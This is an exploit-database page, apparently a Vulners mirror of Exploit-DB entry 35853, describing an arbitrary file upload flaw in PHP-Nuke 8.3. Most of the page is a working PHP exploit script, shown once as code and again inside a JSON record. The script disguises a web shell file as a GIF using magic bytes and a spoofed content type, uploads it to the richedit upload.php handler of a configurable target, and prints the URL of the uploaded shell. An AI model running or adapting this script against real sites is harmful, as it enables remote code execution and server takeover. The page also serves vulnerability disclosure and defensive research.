Search...

Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability 1

2011-06-13T00:00:00

ID EDB-ID:35853
Type exploitdb
Reporter pentesters.ir
Modified 2011-06-13T00:00:00

Description

Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1). Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/48257/info

Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.

Phpnuke 8.3 is vulnerable; other versions may also be affected. 

&lt;?php
///////////////////////////////////////////////////
#Iranian Pentesters Home
#PHP Nuke 8.3 MT AFU Vulnerability
#Coded by:4n0nym0us & b3hz4d
#http://www.pentesters.ir
///////////////////////////////////////////////////
//Settings:
$address = 'http://your-target.com';
$file = 'shell.php.01';
$prefix='pentesters_';


//Exploit:
@$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00";
@$file_data .= file_get_contents($file);
file_put_contents($prefix . $file, $file_data);
$file = $prefix . $file;
echo "\n" . "///////////////////////////////////" ."\n";
echo "     Iranian Pentesters Home" . "\n";
echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n";
echo "///////////////////////////////////" ."\n";
$address_c = $address . '/includes/richedit/upload.php';
$postdata = array("userfile" =&gt; "@$file;type=image/gif","upload" =&gt; "1","path" =&gt; "images","pwd" =&gt; "1");
$data =  post_data($address_c, $postdata);
$start = strpos($data, "&lt;img src=\"upload");
if ($start != null)
{
$data = substr($data,$start + 10);
$end = strpos($data, "\"");
$data = substr($data,0,$end);
echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n";
}
else
echo "\n" . "Upload Failed!!!";
function post_data($address, $data)
{
    $curl = curl_init($address);
    curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)");
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    $content = curl_exec($curl);
    curl_close($curl);
    return $content;
}
?&gt;

JSON Vulners Source

Initial Source

{"id": "EDB-ID:35853", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability 1", "description": "Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1). Webapps exploit for php platform", "published": "2011-06-13T00:00:00", "modified": "2011-06-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/35853/", "reporter": "pentesters.ir", "references": [], "cvelist": [], "lastseen": "2016-02-04T02:09:01", "viewCount": 3, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-02-04T02:09:01", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-04T02:09:01", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://www.exploit-db.com/download/35853/", "sourceData": "source: http://www.securityfocus.com/bid/48257/info\r\n\r\nPhpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.\r\n\r\nAn attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.\r\n\r\nPhpnuke 8.3 is vulnerable; other versions may also be affected. \r\n\r\n<?php\r\n///////////////////////////////////////////////////\r\n#Iranian Pentesters Home\r\n#PHP Nuke 8.3 MT AFU Vulnerability\r\n#Coded by:4n0nym0us & b3hz4d\r\n#http://www.pentesters.ir\r\n///////////////////////////////////////////////////\r\n//Settings:\r\n$address = 'http://your-target.com';\r\n$file = 'shell.php.01';\r\n$prefix='pentesters_';\r\n\r\n\r\n//Exploit:\r\n@$file_data = \"\\x47\\x49\\x46\\x38\\x39\\x61\\x05\\x00\\x05\\x00\";\r\n@$file_data .= file_get_contents($file);\r\nfile_put_contents($prefix . $file, $file_data);\r\n$file = $prefix . $file;\r\necho \"\\n\" . \"///////////////////////////////////\" .\"\\n\";\r\necho \" Iranian Pentesters Home\" . \"\\n\";\r\necho \" PHP Nuke 8.3 MT RFU Vulnerability\" . \"\\n\";\r\necho \"///////////////////////////////////\" .\"\\n\";\r\n$address_c = $address . '/includes/richedit/upload.php';\r\n$postdata = array(\"userfile\" => \"@$file;type=image/gif\",\"upload\" => \"1\",\"path\" => \"images\",\"pwd\" => \"1\");\r\n$data = post_data($address_c, $postdata);\r\n$start = strpos($data, \"<img src=\\\"upload\");\r\nif ($start != null)\r\n{\r\n$data = substr($data,$start + 10);\r\n$end = strpos($data, \"\\\"\");\r\n$data = substr($data,0,$end);\r\necho \"\\n\" . \"Uploaded File: \" . $address . \"/includes/richedit/\" . $data . \"\\n\";\r\n}\r\nelse\r\necho \"\\n\" . \"Upload Failed!!!\";\r\nfunction post_data($address, $data)\r\n{\r\n $curl = curl_init($address);\r\n curl_setopt($curl, CURLOPT_USERAGENT, \"Opera/9.0 (Windows NT 5.0; U; en)\");\r\n curl_setopt($curl, CURLOPT_POST, 1);\r\n curl_setopt($curl, CURLOPT_POSTFIELDS, $data);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\n curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);\r\n $content = curl_exec($curl);\r\n curl_close($curl);\r\n return $content;\r\n}\r\n?>\r\n\r\n", "osvdbidlist": []}